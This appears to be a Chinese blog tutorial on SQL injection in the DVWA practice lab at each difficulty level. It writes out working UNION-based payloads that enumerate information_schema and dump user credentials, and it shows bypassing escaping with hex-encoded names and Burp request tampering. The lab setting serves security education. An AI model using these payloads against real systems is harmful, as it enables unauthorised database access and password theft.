mysql下拉框回显_SQL回显

DVWA-SQL注入

DVWA是一个基于PHP和MySQL开发的漏洞测试平台

测试环境

应用程序: phpStudy(apache,php,mysql)

测试程序: firefox, new hacker, burpsuite,sqlmap,中国菜刀

一、        SQL注入

SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到恶意SQL语句的目的。

二、手工注入常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

三、DVWA注入分析

先将DVWA的级别设置为LOW

1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sq1注入

20200212124306196986.png

20200212124306303436.png

20200212124306608135.png

2.判断sql是否存在注入,以及注入的类型。1’and’1’=’1

20200212124306903068.png

3.猜测SQL查询语句中的字段数,1’order  by  1#

20200212124307302498.png

1’order  by  2#

20200212124307653097.png

1’order  by  3#

20200212124308280074.png

从上面两个图可以看出,SQL语句查询的表字段数是2,确定显示的位置(SQL语句查询之后的回显位置)

1’union select  1,2#从下图中可以看到有两个回显

20200212124308570124.png

查询当前的数据库,以及版本

1’union select  version(),database() #

20200212124308816228.png

获取数据库中的表,1’union select  1,group_concat(table_name) from information_schema.tables where table_schema=database ()#

20200212124309086746.png

20200212124309376796.png

获取表中的字段名,1’union  select  1,group_concat(column_name) from information_schema.columns where table_name=’users’#

20200212124309937364.png

20200212124310251830.png

获取字段中的数据,1’union  select  user,password from users#

20200212124310621961.png

20200212124310991116.png

将DVWA的级别设置为Medium

20200212124311221593.png

中级加入了一些防御,不让用户输入,只提供选择(可用burpsuit抓包来绕过),分析源码可以看到对参数的使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入。

20200212124311410077.png

20200212124311590748.png

通过burpsuit抓包,修改数据包,绕过防御。判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入。1 and 1=1#

20200212124311945254.png

猜解sql查询语句中的字段的个数,测试字段个数1,1 order by

1#

20200212124312298783.png

测试字段个数2,1 order by 2#

20200212124312626921.png

测试字段个数3,1 order by 3#。返回错误页面, 所以字段数为2

20200212124313021467.png

确定回显的位置,下图可以说明有2个回显位置,1 union select 1,2#

20200212124313350581.png

获取当前数据库的名称以及版本,

union select database(), version()#

20200212124313672859.png

获取数据库中的所有表,1 union select 1, group_ concat (table_ name) frominformation_ schema. tables where table_ schema=database()#

20200212124314023459.png

获取表中的所有字段名,考虑到单引号被转义,可以利用16 进制进行绕过。1union select 1, group_ concat (column_ name) from information_ schema. col umnswhere table_ name=0x7573657273#

20200212124314517618.png

获取字段中的数据,1union se lect user, password from users#

20200212124314816458.png

将DVWA的级别设置为High

将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过。

20200212124315179753.png

20200212124315377026.png

点开链接显示下图

20200212124315666100.png

发送1

20200212124315929782.png

查看源码

20200212124316204207.png

获得密码,1’ union select user, password from users#

20200212124316562619.png

20200212124316787237.png

20200212124317098772.png

20200212124317464997.png

将DVWA的级别设置为Impossible,分析源码可以看到使用了PD0技术,杜绝了SQL注入。

20200212124317789228.png

20200212124317968923.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值